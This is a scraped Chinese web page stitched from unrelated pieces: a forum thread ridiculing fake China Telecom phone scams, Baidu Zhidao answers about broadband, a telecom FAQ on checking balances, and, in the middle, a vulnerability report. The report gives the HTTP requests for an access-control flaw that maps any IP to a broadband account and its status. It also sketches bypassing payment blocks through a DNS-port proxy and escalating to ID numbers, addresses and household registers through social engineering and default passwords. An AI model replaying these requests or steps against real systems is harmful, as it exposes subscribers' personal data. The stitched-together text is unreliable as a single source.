当前位置： >
中国电信一万号提醒您，您的座机和宽带将在两小时后停止服务，如需人工查询请按0
整理时间: 22:48 来源: 作者:编辑 点击:次
【楼主】 12:59& 中国电信一万号提醒您，您的座机和宽带将在两小时后停止服务，如需人工查询请按0
&&&&去你大爷的
&&&&有点职业道德好不好
&&&&老子联通宽带你跟我说你是电信一万号还要停我宽带
&&&&这骗子也太没水准了
&&&&骂都懒得骂了直接挂了
&&&&网友评论 13:11
&&&&骗子现在都这么不专业
&&&&网友评论 13:17
&&&&我一直想问 按0不会算我的话费什么的吧
&&&&因为我无聊了就真的按0和那些人扯了半天
一般都是套取一些你的个人信息身份证什么的
&&&&然后再进行下一步
&&&&网友评论 13:41
&&&&只有傻问题才能把真傻的人筛选出来，要不让你播0然后遭受调戏吗？
&&&&把真傻筛选出来后，就可以指导转账了
&&&&网友评论 13:43
&&&&有个骗子跟我说他是警察，说我哥被抓了，网上交保释金
&&&&网友评论 13:50
&&&&这样也有人上钩，你信不
&&&&网友评论 13:50
&&&&中国邮政让你取邮件那个是假的吗
&&&&网友评论 13:51
&&&&上次我说我叫甄子丹。。。。。
&&&&网友评论 13:52
&&&&Reply Post by 是Ash不是安息 ( 13:17):
&&&&我一直想问 按0不会算我的话费什么的吧
&&&&因为我无聊了就真的按0和那些人扯了半天
一般都是套取一些你的个人信息身份证什么的
&&&&然后再进行下一步
&&&&你摁个9他都会给你转接
&&&&网友评论 13:55
&&&&Reply Post by xtree ( 13:41):
&&&&只有傻问题才能把真傻的人筛选出来，要不让你播0然后遭受调戏吗？
&&&&把真傻筛选出来后，就可以指导转账了
&&&&神解释！！！有道理！！！
&&&&网友评论 14:03
&&&&Reply Post by 一雪夜无痕一 ( 13:50):
&&&&中国邮政让你取邮件那个是假的吗
&&&&这么想，熟人寄邮件一般都会知会你的。
&&&&不熟悉的那可能是个炸弹。
&&&&网友评论 14:10
&&&&还有打电话到电信分居局长办公室去给他讲你的宽带欠费要停机的呢。
&&&&网友评论 15:44
&&&&这种电话我上个月至少接了五个，估计占了我家电话通话数的三分之一。。。。
&&&&网友评论 15:48
&&&&目前我家平均每个月有20个左右包裹和邮件需要领取
&&&&网友评论 15:50
&&&&用我家人身份证绑定的座机号说用我身份证查出来的...尼玛装FBI啊
&&&&网友评论 15:50
&&&&Reply to Reply Post by 索莫纳斯 ( 15:48)
&&&&你这频率略高了吧。。
&&&&网友评论 15:51
&&&&我是电信实业的 每天中午都会有人给办公室打电话说要欠费
&&&&今天更是恶劣 说再不交钱就会如何如何 已经欠了多少多少钱
&&&&我给他们跪下了 他们下次能不能看下号码再打
&&&&网友评论 15:52
&&&&求别说，我妈就上周接到这样的电话吓个半死，还好被我及时制止了
&&&&这种其实是专骗中老年人的，上当的人最归不少，还是和自己的父母多解释这会骗局
&&&&网友评论 15:52
&&&&前几天我家也接到，因为一下子想不起来宽带啥时候续费的，差点给忽悠得一愣一愣
&&&&突然想起来
&&&&老子上个月刚改得E9套餐
&&&&网友评论 15:53
&&&&按0就是人工语音了，你问问他们卖不卖蛋炒饭呗。
上一篇： 下一篇：没有了
【精彩图集】
【热门视频】
【相关文章】
Copyright & 日我要查询电信宽带到期时间，请问登陆到电信官网之后应该怎么操作？在用户的个人中心里找了一圈没看到哪里_百度知道
我要查询电信宽带到期时间，请问登陆到电信官网之后应该怎么操作？在用户的个人中心里找了一圈没看到哪里
我要查询电信宽带到期时间，请问登陆到电信官网之后应该怎么操作？在用户的个人中心里找了一圈没看到哪里显示着到期时间(+_+)
查询宽带到期时间您好。另外可以拨打10000转人工咨询，建议您到当地的电信营业厅查询
中国电信，世界触手可及
主营：宽带、手机、充值缴费
其他类似问题
为您推荐：
其他1条回答
打10000问问
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁电脑浏览器显示正在为您查询帐号状态是什么意思?宽带连接连上了，浏览器是这样显示的。_百度知道
电脑浏览器显示正在为您查询帐号状态是什么意思?宽带连接连上了，浏览器是这样显示的。
提问者采纳
重新安装下浏览器试试吧
估计是浏览器问题
其他类似问题
为您推荐：
宽带连接的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
中国电信ADSL宽带信息泄露+欠费照样上网，可查任意IP对应的宽带账号、电话号码、身份证、户口本，上门砍人。
详细说明：
标题纯属娱乐……
嗯，原文地址：http://**.**.**.**/?i=3422
家里宽带有一段时间没用了，打开一开，你妹的，跳到欠费页面，好吧，既然上不了网，就研究一下电信ADSL宽带在欠费情况下会出现什么状况……
花了点时间分析了下，于是这篇文章就出来了（此处针对的是陕西电信，其他省市应该雷同）。
电信有线宽带欠费状态：
1、拦截使用任何通讯，TCP、ICMP、UDP等协议只允许访问电信官网，例如：**.**.**.**，推测是基于IP过滤。
2、但可以使用53端口的UDP通讯（DNS查询协议）。
3、不限制53端口UDP通讯的目标IP地址，例如：nslookup **.**.**.** **.**.**.**，所以可以使用udp代理绕过电信拦截，访问互联网。
4、任何访问80端口的数据（任何IP地址，除了电信官方网站，例如：**.**.**.**），将被强制重定向到“http://**.**.**.**/jsp/691error/queryTypes.jsp”（电信可以随时劫持任何通讯）。
5、可以无障碍访问电信官方网站，例如：**.**.**.**，其他域名将被重定向（参考：4）。
重定向后的流程：
1、首先访问691错误页面：
GET http://**.**.**.**/jsp/691error/queryTypes.jsp
提示：返回的数据中会存在一些有价值的信息，例如：
var ip = &113.*.*.193&;
2、然后通过IP查询对应的宽带账号：
（呵呵，这证明电信会实时储存IP对应的用户信息，所以嘛，公安抓你很容易……）
POST /freeAccountLogin HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/jsp/691error/queryTypes.jsp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 ( MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: **.**.**.**
Content-Length: 17
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ******
ip=113.*.*.193
返回数据：
HTTP/1.1 200 OK
Date: Sat, 13 Apr :37 GMT
Content-Length: 40
Content-Type: text/ charset=utf-8
P3P: CP=CAO PSA OUR
X-Powered-By: Servlet/2.5 JSP/2.1
{&account&:&02900******&,&latnId&:&290&}
GET方式也可以，例如：http://**.**.**.**/freeAccountLogin?ip=113.***.***.192
这里存在严重的信息泄露安全隐患：
我们可以修改参数为任意ip，查询任何人的宽带账号（提示：配合QQ显IP插件，你懂的），再进一步社工+渗透，可以得到姓名、身份证、住址、电话号码等绝密私人信息（我怎会告诉你：在电信官网密码找回或简单社工，而且很多是默认密码，直接进去，户口本就有了……），从而做到上门砍人，咳咳，扯远了……
你懂的……
亲，电话号码露出来了……
深入一下：
如果这里绑定了本机IP，只能查到自己IP对应的账号，那么我们该如何操作呢？
假设绑定了IP，仍旧还存在其他安全隐患，例如：在肉鸡上开代理（和很多年前刷钻一样，你懂的）、XSS，等其他手段都可以获取到这个信息，或者扫描陕西电信IP段存在的天然代理，例如6666端口，具体不解释，你懂的……
3、然后查询该宽带账号的信息：
POST /service/error/queryTypes.action HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/jsp/691error/queryTypes.jsp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 ( MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: **.**.**.**
Content-Length: 29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ******
loginName=02900******&latnId=290
（GET也可以：http://**.**.**.**/service/error/queryTypes.action?loginName=02900******&latnId=290）
提示：这里参数 loginName 没有限制，所以你可以查询任何宽带账号的状态……
返回数据：
HTTP/1.1 200 OK
Date: Sat, 13 Apr :57 GMT
Content-Length: 11
P3P: CP=CAO PSA OUR
X-Powered-By: Servlet/2.5 JSP/2.1
{&msg&:&1&}
msg参数对应的状态：
success:function(data) {
if(data.msg=='0') {
//该帐户当前属非正常状态，请您携带有效证件到营业厅办理或拨打10000号咨询。
window.location.href=&/jsp/691error/shutdown.jsp&;
}else if(data.msg=='1') {
//您好，您的宽带已欠费！
window.location.href=&/jsp/691error/qryowemoney.jsp&;
}else if(data.msg=='3') {
//请您拨打10000号，联系客服人员处理。
window.location.href=&/jsp/691error/otherTypes.jsp&;
}else if(data.msg=='4') {
$(&#error&).show();
$(&#error&).html('&h5&系统繁忙，请稍后再试!&/h5&');
error: function(json) {
$(&#error&).show();
$(&#error&).html(&&);
$(&#error&).append(&&h5&系统忙，请稍后再试！&/h5&&);
4、然后重定向页面到状态码对应的Url地址：
您好，您的宽带已欠费！
http://**.**.**.**/jsp/691error/qryowemoney.jsp
5、然后该干嘛干嘛去……
嗯，原文地址：http://**.**.**.**/?i=3422
漏洞证明：
亲，电话号码露出来了……
修复方案：
版权声明：转载请注明来源 @
厂商回应：
危害等级：高
漏洞Rank：11
确认时间： 23:28
厂商回复：
CNVD确认所述情况，已转由CNCERT直接协调中国电信集团公司处置。该案例已经超越常见漏洞风险实例，与业务认证逻辑也相关。
按部分信息泄露风险以及权限绕过综合评分,rank 11
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
别激动 淡定 理智啊！
。。核总博客已发
@核攻击 核总~ 全国电信ADSL都可以吗？
围观核总。。。
围观核总。。。
新开户的账号直接可以用来上网。陕西电信有个系统我就不多说了。= =
围观核总。。。
我想这应该不是一个负责任的漏洞纰漏方式。
发乌云了,为什么还公布啊..http://lcx.cc/?i=3422..
咦，以上各位我很奇怪啊，为啥发乌云就不能公开了呢？这是个啥说法……
公不公开属个人自由，修不修补是厂商的事，没有义务替他保密，但可以说是有点不负责任（纯道德上）……
这个漏洞危害够大的啊
@核攻击 回复神了 核总
@核攻击 核总要奴役全人类鸟...
这个会火,留个名---天王盖地虎
肯定会火，同留名---小鸡炖蘑菇
在核总博客看啦~~牛啊！！！！
udp代理，用什么工具哈？
登录后才能发表评论，请先欢迎来到"中国电信宽带网" 本站提供电信宽带申请，套餐指南！
如何在网上查询电信宽带/电信手机话费余额，账户余额？
发布时间： 11:55
如何在网上查询电信宽带/电信手机话费余额，账户余额？很多用户想查询一下自己的余额，确不知道准确的方法，本文列出目前最方便的几种方法，供用户参考。
如需转载，请注明网
1: 直接拨打中国电信自助查询热线10001号，按1号就可以直接查询余额。需要本机拨打。才可以查询到
2: 直接拨打中国电信人工查询热线10000号，按0号就可以直接转人工，有什么对他问什么就可以了。
3: 可以发送短信，0到10001，通过短信也可以查询余额的，免费的，也需要用本机拨打。
4: 最后一个办法就是通过网上营业厅，查询了。 首先登陆，在右边登陆。登陆后点我的账户余额就可以看到了，如果忘记密码。请查看&&